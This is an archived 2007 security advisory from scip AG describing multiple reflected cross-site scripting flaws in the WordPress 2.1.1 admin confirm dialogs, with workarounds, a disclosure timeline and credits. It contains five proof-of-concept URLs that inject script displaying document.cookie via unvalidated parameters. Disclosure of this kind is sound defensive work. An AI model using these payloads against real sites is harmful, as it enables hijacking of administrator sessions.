scip-2962.txt

2007-03-06T00:00:00
ID PACKETSTORM:54803
Type packetstorm
Reporter scip.ch
Modified 2007-03-06T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities  
  
scip AG Vulnerability ID 2962 (02/27/2007)  
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962  
  
I. INTRODUCTION  
  
"WordPress is a state-of-the-art semantic personal publishing platform   
with a focus on aesthetics, web standards, and usability."  
More information is available on the project web site at the following URL:  
  
http://www.wordpress.org  
  
II. DESCRIPTION  
  
Stefan Friedli found several vulnerabilities based on an advisory   
entitled "WordPress AdminPanel CSRF/XSS - 0day" by "Samenspender" which   
described a lack of input validation when deleting posts that allows   
injection of arbitrary code. The vulnerability was reported on February,   
26th and is referenced in section VII.  
  
Further to this vulnerability which was limited on manipulating the   
"post"-parameter, there are several other vulnerabilities which are very   
similar to the one mentioned above. Every operation that makes use of   
the common confirm-dialog is vulnerable for this type of attack.  
  
Possible injection...  
  
... when deleting posts as mentioned in Samenspenders advisory   
(unvalidated parameter: post, file: post.php)  
http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
... when deleting comments (unvalidated parameter: c, file: comment.php)  
http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
... when deleting pages (unvalidated parameter: page, file: page.php)  
http://target.tld/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
... when deleting categories (unvalidated parameter: cat_ID, file:   
categories.php)  
http://target.tld/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
... when deleting comments (unvalidated parameter: c, file: comment.php)  
http://target.tld/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
IV. IMPACT  
  
This list may not be exhaustive. It illustrated that the flaw with   
confirmation dialogs in Wordpress is not limited to the "Delete   
Post"-function. Fixing the validation of the post parameter as suggested   
by e.g. Secunia does not fix the problem and does not reduce the threat   
of cross-site-scripting or any other webbased exploitation.  
  
V. DETECTION  
  
This flaws can be detected by using any web browser.  
  
VI. SOLUTION  
  
Until these issues are patched, possible workarounds are manual fixing   
or the usage of a application level filter like mod_security for Apache.  
  
VII. SOURCES  
  
Samenspender - WordPress AdminPanel CSRF/XSS - 0day  
http://seclists.org/bugtraq/2007/Feb/0494.html  
  
scip AG - Security Consulting Information Process (german)  
http://www.scip.ch  
  
scip AG Vulnerability Database (german)  
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962  
  
IX. DISCLOSURE TIMELINE  
  
02/26/06 Release of "Delete Post"-Confirmation Vulnerability  
02/27/06 Identification of further vulnerabilities  
02/27/06 Immediated Release for informational purposes  
  
IX. CREDITS  
  
The vulnerabilities were discovered by Stefan Friedli.  
  
Stefan Friedli, scip AG, Zuerich, Switzerland  
stfr-at-scip.ch  
http://www.scip.ch  
  
A2. LEGAL NOTICES  
  
Copyright (c) 2007 scip AG, Switzerland.  
  
Permission is granted for the re-distribution of this alert. It may not   
be edited in any way without permission of scip AG.  
  
The information in the advisory is believed to be accurate at the time   
of publishing based on currently available information. There are no   
warranties with regard to this information. Neither the author nor the   
publisher accepts any liability for any direct, indirect or   
consequential loss or damage from use of or reliance on this advisory.  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP Desktop 9.0.6  
  
iQA/AwUBReRJv1J79Mw3xa1EEQJXagCdHOT7ib4I8XSqMsaUAKA8vaO8i8QAn2SS  
oTWNsT+cOMwFq+XKsZqq6yJ/  
=REO6  
-----END PGP SIGNATURE-----  
`